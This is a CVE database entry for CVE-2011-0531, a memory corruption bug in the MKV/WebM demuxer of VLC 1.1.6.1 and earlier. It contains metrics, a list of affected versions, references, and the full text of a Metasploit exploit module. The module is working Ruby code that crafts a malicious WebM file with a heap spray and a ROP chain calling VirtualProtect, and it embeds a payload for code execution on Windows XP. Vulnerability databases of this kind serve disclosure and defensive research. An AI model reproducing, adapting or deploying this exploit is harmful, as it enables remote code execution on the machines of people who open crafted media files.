CVE-2011-0531 : Detail

CVE-2011-0531

A03-Injection
96.76%V3
Network
2011-02-07
19h19 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

demux/mkv/mkv.hpp in the MKV demuxer plugin in VideoLAN VLC media player 1.1.6.1 and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary commands via a crafted MKV (WebM or Matroska) file that triggers memory corruption, related to "class mismatching" and the MKV_IS_ID macro.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16637

Publication date : 2011-02-07 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: vlc_webm.rb 11725 2011-02-08 18:22:36Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'VideoLAN VLC MKV Memory Corruption', 'Description' => %q{ This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. }, 'License' => MSF_LICENSE, 'Author' => [ 'Dan Rosenberg' ], 'Version' => '$Revision: 11725 $', 'References' => [ [ 'OSVDB', '70698' ], [ 'CVE', '2011-0531' ], [ 'BID', '46060' ], [ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ], [ 'URL', 'http://www.videolan.org/security/sa1102.html' ] ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true, }, 'Platform' => 'win', 'Targets' => [ [ 'VLC 1.1.6 on Windows XP SP3', { 'SprayTarget' => 0x030b030a, 'Ret' => 0x6ce091b5, # Pointer to SprayTarget 'Base' => 0x6cd00000, # Base of libtaglib_plugin.dll } ], ], 'Privileged' => false, 'DisclosureDate' => 'Jan 31, 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.webm']), ], self.class) end def exploit rop_base = target["Base"] spray = target["SprayTarget"] # EBML Header file = "\x1A\x45\xDF\xA3" # EBML file << "\x01\x00\x00\x00" file << "\x00\x00\x00\x1F" file << "\x42\x86\x81\x01" # EBMLVersion = 1 file << "\x42\xF7\x81\x01" # EBMLReadVersion = 1 file << "\x42\xF2\x81\x04" # EBMLMaxIDLength = 4 file << "\x42\xF3\x81\x08" # EBMLMaxSizeLength = 8 file << "\x42\x82\x84\x77" # DocType = "webm" file << "\x65\x62\x6D" file << "\x42\x87\x81\x02" # DocTypeVersion = 2 file << "\x42\x85\x81\x02" # DocTypeReadVersion = 2 # Segment data file << "\x18\x53\x80\x67" # (0) Segment file << "\x01\x00\x00\x00" file << "\x01\xD6\x22\xF1" # Seek data file << "\x11\x4D\x9B\x74" # (1) SeekHead file << "\x40\x3F" file << "\x4D\xBB\x8B" # (2) Seek file << "\x53\xAB\x84" # (3) SeekID = Segment Info file << "\x15\x49\xA9\x66" # file << "\x53\xAC\x81" # (3) SeekPosition file << "\xff" # index of segment info # Trigger the bug with an out-of-order element file << "\x53\xAB\x84" # (3) SeekID = Tracks file << "\x16\x54\xAE\x6B" # file << "\x42" * 228 # Padding # Data file << "\x15\x49\xA9\x66" # (1) Segment Info file << "\x01\x00\x00\x00" # file << "\x01\xff\xff\xff" # This triggers our heap spray... file << [target.ret].pack('V') # Pointer to our heap spray # The alignment plays nice, so EIP will always # hit our pivot when our heapspray works. ESI contains # 0x030b030a, which will point to one of our "pop; retn" # pointers, so this works as both a pivot and NOPsled block = [ rop_base + 0x229a5, # xcgh esi,esp; retn rop_base + 0x2c283, # pop eax; retn 0xdeadbeef, # pad rop_base + 0x2c283, # pop eax; retn ] block = block.pack('V*') # ROP payload rop = [ rop_base + 0x1022, # retn # Call VirtualProtect() rop_base + 0x2c283, # pop eax; retn rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax rop_base + 0x12fda, # mov eax,DWORD PTR [eax] rop_base + 0x29d13, # jmp eax rop_base + 0x1022, # retn spray & ~0xfff, # lpAddress 0x60000, # dwSize 0x40, # flNewProtect spray - 0x1000, # lpfOldProtect # Enough of this ROP business... rop_base + 0xdace8 # push esp; retn ] rop = rop.pack('V*') # Overwrite the bad pointer with the address of an infinite # loop so the other threads spin instead of crashing rop << "\xc7\x05" rop << [spray + 0xc].pack('V') rop << [rop_base + 0x1c070].pack('V') # mov DWORD PTR ds:[ptr],&loop # Restore the stack rop << "\x87\xe6" # xchg esi,esp # Payload rop << payload.encoded # We need to be 16-byte aligned rop << "\xcc" * (16 - rop.length % 16) # Heapspray and payload, go! 32.times { 0x3000.times { file << block } file << rop } print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(file) end end

Products Mentioned

Configuraton 0

Videolan>>Vlc_media_player >> Version To (including) 1.1.6.1

Videolan>>Vlc_media_player >> Version 0.1.99b

Videolan>>Vlc_media_player >> Version 0.1.99e

Videolan>>Vlc_media_player >> Version 0.1.99f

Videolan>>Vlc_media_player >> Version 0.1.99g

Videolan>>Vlc_media_player >> Version 0.1.99h

Videolan>>Vlc_media_player >> Version 0.1.99i

Videolan>>Vlc_media_player >> Version 0.2.0

Videolan>>Vlc_media_player >> Version 0.2.60

Videolan>>Vlc_media_player >> Version 0.2.61

Videolan>>Vlc_media_player >> Version 0.2.62

Videolan>>Vlc_media_player >> Version 0.2.63

Videolan>>Vlc_media_player >> Version 0.2.70

Videolan>>Vlc_media_player >> Version 0.2.71

Videolan>>Vlc_media_player >> Version 0.2.72

Videolan>>Vlc_media_player >> Version 0.2.73

Videolan>>Vlc_media_player >> Version 0.2.80

Videolan>>Vlc_media_player >> Version 0.2.81

Videolan>>Vlc_media_player >> Version 0.2.82

Videolan>>Vlc_media_player >> Version 0.2.83

Videolan>>Vlc_media_player >> Version 0.2.90

Videolan>>Vlc_media_player >> Version 0.2.91

Videolan>>Vlc_media_player >> Version 0.2.92

Videolan>>Vlc_media_player >> Version 0.3.0

Videolan>>Vlc_media_player >> Version 0.3.1

Videolan>>Vlc_media_player >> Version 0.4.0

Videolan>>Vlc_media_player >> Version 0.4.1

Videolan>>Vlc_media_player >> Version 0.4.2

Videolan>>Vlc_media_player >> Version 0.4.3

Videolan>>Vlc_media_player >> Version 0.4.4

Videolan>>Vlc_media_player >> Version 0.4.5

Videolan>>Vlc_media_player >> Version 0.4.6

Videolan>>Vlc_media_player >> Version 0.5.0

Videolan>>Vlc_media_player >> Version 0.5.1

Videolan>>Vlc_media_player >> Version 0.5.2

Videolan>>Vlc_media_player >> Version 0.5.3

Videolan>>Vlc_media_player >> Version 0.6.0

Videolan>>Vlc_media_player >> Version 0.6.1

Videolan>>Vlc_media_player >> Version 0.6.2

Videolan>>Vlc_media_player >> Version 0.7.0

Videolan>>Vlc_media_player >> Version 0.7.2

Videolan>>Vlc_media_player >> Version 0.8.0

Videolan>>Vlc_media_player >> Version 0.8.1

Videolan>>Vlc_media_player >> Version 0.8.2

Videolan>>Vlc_media_player >> Version 0.8.4

Videolan>>Vlc_media_player >> Version 0.8.5

Videolan>>Vlc_media_player >> Version 0.8.6

Videolan>>Vlc_media_player >> Version 0.9.2

Videolan>>Vlc_media_player >> Version 0.9.3

Videolan>>Vlc_media_player >> Version 0.9.4

Videolan>>Vlc_media_player >> Version 0.9.5

Videolan>>Vlc_media_player >> Version 0.9.6

Videolan>>Vlc_media_player >> Version 0.9.8a

Videolan>>Vlc_media_player >> Version 0.9.9

Videolan>>Vlc_media_player >> Version 0.9.10

Videolan>>Vlc_media_player >> Version 1.0.0

Videolan>>Vlc_media_player >> Version 1.0.1

Videolan>>Vlc_media_player >> Version 1.0.2

Videolan>>Vlc_media_player >> Version 1.0.3

Videolan>>Vlc_media_player >> Version 1.0.4

Videolan>>Vlc_media_player >> Version 1.0.5

Videolan>>Vlc_media_player >> Version 1.0.6

Videolan>>Vlc_media_player >> Version 1.1.0

Videolan>>Vlc_media_player >> Version 1.1.1

Videolan>>Vlc_media_player >> Version 1.1.2

Videolan>>Vlc_media_player >> Version 1.1.3

Videolan>>Vlc_media_player >> Version 1.1.4

Videolan>>Vlc_media_player >> Version 1.1.5

Videolan>>Vlc_media_player >> Version 1.1.6

References

http://osvdb.org/70698
Tags : vdb-entry, x_refsource_OSVDB
http://www.vupen.com/english/advisories/2011/0363
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/43242
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2011/dsa-2159
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/43131
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2011/01/31/4
Tags : mailing-list, x_refsource_MLIST
http://www.securitytracker.com/id?1025018
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/46060
Tags : vdb-entry, x_refsource_BID
http://www.openwall.com/lists/oss-security/2011/01/31/8
Tags : mailing-list, x_refsource_MLIST